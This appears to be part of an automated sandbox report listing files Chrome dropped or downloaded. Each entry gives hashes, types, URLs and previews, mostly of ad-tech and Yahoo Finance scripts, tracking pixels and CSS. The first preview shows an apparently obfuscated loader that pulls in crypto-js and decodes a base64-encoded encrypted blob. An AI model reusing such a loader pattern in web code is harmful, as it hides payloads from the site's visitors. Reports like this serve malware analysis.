                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview: var oRoGLkjFnkuRSzBm = document.createElement("script");..oRoGLkjFnkuRSzBm.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(oRoGLkjFnkuRSzBm);..oRoGLkjFnkuRSzBm.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiTkYzaXYzcVhnSjBMTzBmWnZ4a2RhQmFpT1ZyU0hQSmNXRWp1cWhvOVJ0cE82SzNhUDZuUlNtc2Qxamg0U2V2R3kwZ0ZDTXVOZVhRZXRkYktCVzd6TnNubkp6MGF4eXZ6M3Z4TlRxVm1uMUhoSGdDTkpacmJEUGJhakx4Ym5sdjVhRVFPVGFSb2ZIK0szNDJ4UGZ3V0lxdENYdEYyaTBTU2RBZ3dVdmZqXC9XYTV4OUtsNzBWUWJ4a040dndHSGdlZ3QycmptbVZxY2ZXUmU2MzFFWFlKY0VDN0ZcL3QxT1gySHJtUzk3a0NFN3cxcUJLem1VMlpnWklQY2wyVEdJNDJMcUJiYVNlXC9oeU9xXC8rQUJHQ0l2enNiMkFiZUdhWFJXRzFNNCtCNUlQM2dKOVB4MklUV0tNRTBkblB0b3FsTGtZVWVEKzJjdXdFcVJsVXprTnY2eU9OVXk2M0ZzRkRhcTVkV0pVVWxiaDhjSVMzcGNaXC9JSnp2V3dsc2VRRWFHbVROTDRyYTU4MFZZMFFRV0RJZTNicndDZW9HSjIzN29XaG05RTllRlNhMno0XC9qZllmNDJ4bTFwY2RCakpiczUrbjllb1NyUGZTdm1PR3hZalU1blR2cXNsVGY1M0o1YU4zc1RHK01TZUZmR2hnTWZYTWNTaEVKN2s4a3NGSFBHVFZQWVwvN1l5ZnpEaV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (552)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.456561817569209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YQWyL+xpRHUkcQ5V6BJb2JIDkGXc2TjPtKZ+jLuWV6CKEJdnodQ:gKAaVH3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0103E9F52EF96B8BF7939EEBD681D92A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3C7DE469CB144E200BF067650FB3A1A3053640A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EB803B33E2BC6F51CB86B2F318B3850BDED63348CC585E8E4BA0AC59AF18C5F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:80AFAEEB3D14D8D067BF69BBCA978A4F6BAB071CC2D737323CF8981A31214131CD12EFC5DE63B78C39656C2AF7303569F152FE7DFE7F0E13F01B10836D88FD47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Perfect Market Widget Platform Library. Copyright (C) 2011 Perfect Market, Inc.. All Rights Reserved.. NO PERMISSION IS GRANTED TO COPY OR USE CODE EXCEPT AS IS . NECESSARY TO DISPLAY ADS IN THE NORMAL COURSE OF BROWSING A WEB SITE.. CONFIDENTIAL COPYRIGHTED AND PATENTED MATERIAL. US PATENTS 7,610,279 7,644,072 7,617,200 and 7,627,565. OTHER PATENTS PENDING.. DO NOT DECOMPILE OR REVERSE ENGINEER.*/.function m(){return function(){}}function q(b){return function(a){this[b]=a}}function s(b){return function(){return this[b]}}var _pmk=_pmk||{};window._pmk=_pmk;TBWidgetFacebook=function(){this.B="stp";this.name="facebook";this.Ma=!1;this.L=[];this.ia=[];this.Oi=this.pi=!1;this.zh=0;TBWidgetFacebook.prototype.k=m();TBWidgetFacebook.prototype.Ca=m();TBWidgetFacebook.prototype.yh=m();TBWidgetFacebook.prototype.P=function(){this.Ma=!0}};window.TBWidgetFacebook=TBWidgetFacebook;.TBVideoElem=function(b,a,c){this.Wd="none";this.rd=this.Qf="video";this.td="player-div";if(null!==b)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (708)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.49790335648462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:2ebxkC6DVU4dxhwVVIn2bucQLMGOJlxThUscVvgVQxkHtnYpNnm+lnOBIdNcDgXD:2e2C6hHfhiVIntcQc/FdcpytvEdNwg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F9A146C07CCE171D05267F451661549F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F15CE7F831231A5F5607F57C59AE29AE91D5CC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:389EA1115EEDA048BFB3DF62E2CB62800C9646773A23BC0857F45453F976D0A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3E1252A01DCBFDF04B31CFBAA385C52FE8103F70DE69CE880854B3FEFE343C9294851C3915297EFB282B975357DD4AD662A01A8EC039ECA209EDDDE4EA2239CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/cm?id=dc2068a3-fa3d-4b5f-8a61-3d5a1a58fc05&ph=21f03281-5b83-4670-a0e0-dc15f7542014&r=https%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D76%263pid%3D%7BOPENX_ID%7D&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://ce.lijit.com/merge?pid=76&3pid=870cd803-c089-09b5-30ed-306437983b4a&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1"><img src="https://id.rlcdn.com/709996.gif"><img src="https://idpix.media6degrees.com/orbserv/hbpix?pixId=856286&pcv=125&ptid=23&tpuv=00&tpu=474f9349-32a5-168e-8078-cd316ae444da"><img src="https://sync.srv.stackadapt.com/sync?nid=268"><img src="https://b1sync.zemanta.com/usersync/openx?puid=c02f7c85-c1b5-023a-2062-1a006c39da63&cb=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D560843120%26val%3D__ZUID__"><img src="https://rtb.openx.net/sync/dds"><img src="https://sync.ipredictive.com/d/sync/cookie/generic?https://us-u.openx.net/w/1.0/sd?id=537073028&val=${ADELPHIC_CUID}">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_cver=1&google_gid=CAESEK3c4y98ePl-1rmvhw-UEao&google_hm=T1BVZjhkNTFjMTI1YjI2NGZiZDllOGJhZjc0NjVlNTUyNTQ&google_nid=opera_norway_as&google_push=AXcoOmSaBmF7VuUPE1O62gGxE2n182n5FtN9ar3cCAIF-5FodL6_96WSGOkaCfv39Z0rktxSd5wu3EWalwLqTheiE0T1XfgjtYy6ug
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882615022444105
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:Yh0Z9NoV+DgP6BeHn56ADg44a/NRADN/VFYrN/HgSoZN/W5icpCyrN/NHWFN/vTD:Yy9NocDgP6wH56ADg44wRMN/VirN/HgL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:683E38374CE11C61A5CF2295F7D9B58A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D1AC301B8B079FD32157FED7C5BC52DF5996FC5F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:68C16599C7A1B729AA31E1AD7ECF60D69D883F08682A62714A9E4A3D12B7BD4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:558CA3531D4DFEE8611A1384A70A8C35B55C2A5A93DF643A602468D32465D3FCA3E10518A5B4F13F44CC50E5AB502DE1F69E5FB32EAC05F9A2E960E576808772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.0fd45e30dadfbc5beb5038219cf70da8.min.css","name":"react-wafer-shopping.ShoppingContent.atomic"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css","name":"react-wafer-shopping.custom.desktop"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-toggle-1.15.4-modern.js","name":"wafer-toggle","version":"1.15.4"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"},{"location":"bottom","value":"/aaq/wf/wf-caas-1.36.6-modern.js","name":"wafer-caas","version":"1.36.6"},{"location":"bottom","value":"/aaq/wf/wf-image-1.4.0-modern.js","name":"wafer-image","version":"1.4.0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.883606614609165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHTmHGFVcVwRuVuVqR2VQcsHASAdSbFy:H69mc4sl3O4ThVcVwRaaprsgx7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:827368291B41497FE4F55F2E33E2119B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9CAD22C912012194A12CF8B5B74C1568549FF5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4A886A2D2445C248984DAF4CD9789ABF3F8EADFDA69C3CA08DA1FFDB24F10027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7C207ECD4A50A48A1F0A98E94DAE3A68B4A7AB1884A194C631C167036C6BC1ADC7B344B86BE9DB444E9B59D2DC6DA8734CEDAED4A96E9B356A0407B7EC636316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 2C6.47 2 2 6.47 2 12s4.47 10 10 10 10-4.47 10-10S17.53 2 12 2"/></svg>';export{s as c};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.722171450366903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSx/FRuv24RFJR2u+JCII+JWRnMeK+D:OE2c12dCII+JWnfKO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ED8A91B22F9D7E324FEC51213C83DD6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F6F110EA47068F7CE14172CF4D82963C78E3D2FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4C51B01CFFBB8E6B49A9E0632D89DD406983979C81C4C1F397472D03E87DF60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C1B575D37A0ABCCE3FE9DF102E328FECC366E931B31F72A39E883CD21456E47BEB1AC5F38F0CFE527E3941EFC067DA6D3274B5705DE11390BCF9FB2C83315D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/context.BGtg7DvY.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{c as t}from"./contextUtil.DIxB3t2m.js";const r=t("ad-constraint");export{r as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13778), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2842901333678345
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:/JwTpCNwszoTDPohnGZA3exQUqxL/wwBVi:elCNw/XoR4A3eePbi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4443A60B3D3645610C9E65B7CC9F15BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DE3A0B8509362B37FB40D74A9883F366D161A8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F271BF73D0EEFE04F56CB6390E07D7D2A4794787283D65221397B258CEF040DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6134E0CE99CC2128F03FF38713B7A88617EA9C1518F01C6D56CD725673C0F58B58572E4744C6254868D98BE8EF9AF352BA0B724290EB35D182AA5F57381048B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-action"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(a){if(r[a])return r[a].exports;var i=r[a]={i:a,l:!1,exports:{}};return t[a].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,a){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:a})},e.n=function(t){var r=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(r,"a",r),r},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,r){"use strict";function a(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32009)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):41328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.57489917225997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:jI0V6KWzRTLP8B49AF/ewZTPrVpk7uvWXA9JfIFLeCB8BPxz7P7nI:jI0VH4dLk2IrVpyXGKXkPxbnI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CFBFF7D208CCFDBE176B9855AF1EB1FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:023D9077D7129F0EB0203253EA34FE999536FA6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:24ECE61E45E94BCB16969DC25B12DD94CC0C4EF9A968BD524B36D1388141CB4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:229223DAE93D1985B34D543F94DA54FAF04786F907366ECF6BA8A113DD2E2C90D64D9DC7A77EA44FD77CFF0564898A76194E207AD746A5947FD6046F4F2C6B8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/ads/studio/cached_libs/cssplugin_1.19.0_cfbff7d208ccfdbe176b9855af1eb1fa_min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*!. * VERSION: 1.19.0. * DATE: 2016-07-14. * UPDATES AND DOCS AT: http://greensock.com. *. * @license Copyright (c) 2008-2016, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. */.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("plugins.CSSPlugin",["plugins.TweenPlugin","TweenLite"],function(a,b){var c,d,e,f,g=function(){a.call(this,"css"),this._overwriteProps.length=0,this.setRatio=g.prototype.setRatio},h=_gsScope._gsDefine.globals,i={},j=g.prototype=new a("css");j.constructor=g,g.version="1.19.0",g.API=2,g.defaultTransformPerspective=0,g.defaultSkewType="compensated",g.defaultSmoothOrigin=!0,j="px",g.suffixMap={top:j,right:j,bottom:j,left
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):172900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.784153623723486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fGfa5JHO:qHdALSAG78KI4NBT0L4jWlYoL9N78fGx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:309AE61124FA428D9EBE2C408FA947C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:590A25BFC14DC37D47C45A50B70452BC367C8F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E38A2FD196FF6830AE7C12EED74C099F060E19C26A1A8FD04DE545D682DE17B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB3DEA14F47ECBA5798CFBE6AFBF898617A0DA79A1D924AA1DFD83066AB160145D19E89B0B5F1D9D032CA3179341B8CD39087FA826DA90C0B8666EB3AFDD63ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/f10d509c/d1ccw66oyq8ex2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2288)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2289
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9695026854614825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:LBP5KB5PRzAJfJhHVHi0f8oHXQuV6aJnevLkIHH4H7HOP:J5Kp8JRoAhd2T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4629D170EC95CCD03C1E4A97C8E1644B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9CCB04CEC88A5D8A0E33FC505E4058DFDA956836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4EA0FB5DD11C18ED4E8551EA73E9926602EB3959DE18FB0D47BA820E6C7A5DEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F60FC574C658E97B091A45B1BA6F6DC6560B8CF1C68FA6F9FC5BD4E85C02AC524A867FFA7551E8789E9A9BC53276B0B16080680F208F7E8C682F4D45E1E5213D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Tabs.agUa80w0.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.tabList.yf-gfq5ju.yf-gfq5ju{display:inline-flex;align-items:baseline;border-radius:var(--border-radius-s);position:relative;scroll-snap-type:x mandatory;scroll-behavior:smooth;scrollbar-width:none}.tabList.l2.yf-gfq5ju.yf-gfq5ju{align-items:center}.tabList.yf-gfq5ju.yf-gfq5ju::-webkit-scrollbar{display:none}.tabList.yf-gfq5ju .tabBtn.yf-gfq5ju{--tab-color:var(--primary);--tab-transition-duration:.15s;display:flex;align-items:center;transition-property:color,border-color;transition-duration:var(--tab-transition-duration);transition-timing-function:ease-in-out;background-color:var(--tab-bg-color, transparent);border-radius:var(--border-radius-s);color:var(--tab-color);font-weight:var(--font-medium);font-size:var(--tab-size, var(--font-m));line-height:1.25;padding:0 var(--space-3);cursor:pointer;gap:var(--space-1);white-space:nowrap}.tabList.yf-gfq5ju .tabBtn.l1.yf-gfq5ju{--tab-size:var(--font-m);height:2rem}.tabList.yf-gfq5ju .tabBtn.l2.yf-gfq5ju{--tab-size:var(--font-s);height:1.5rem}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1058)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1109409484305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:DOd1kGZRWAWJq2qFeR0MANmvtssvujjSYWeYmL4Na2Gev:k1Vwj9Rc7s4jUeJ4NbGw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:37ADF3441948B71BD7589823F7BCD0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D99AA0426A06385C92F81D69030FA61CE9B2B966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1B4C8ECE36EC68266F8B7EC948AEB5A1766CC29D444B47C328B95F89A2482F0F
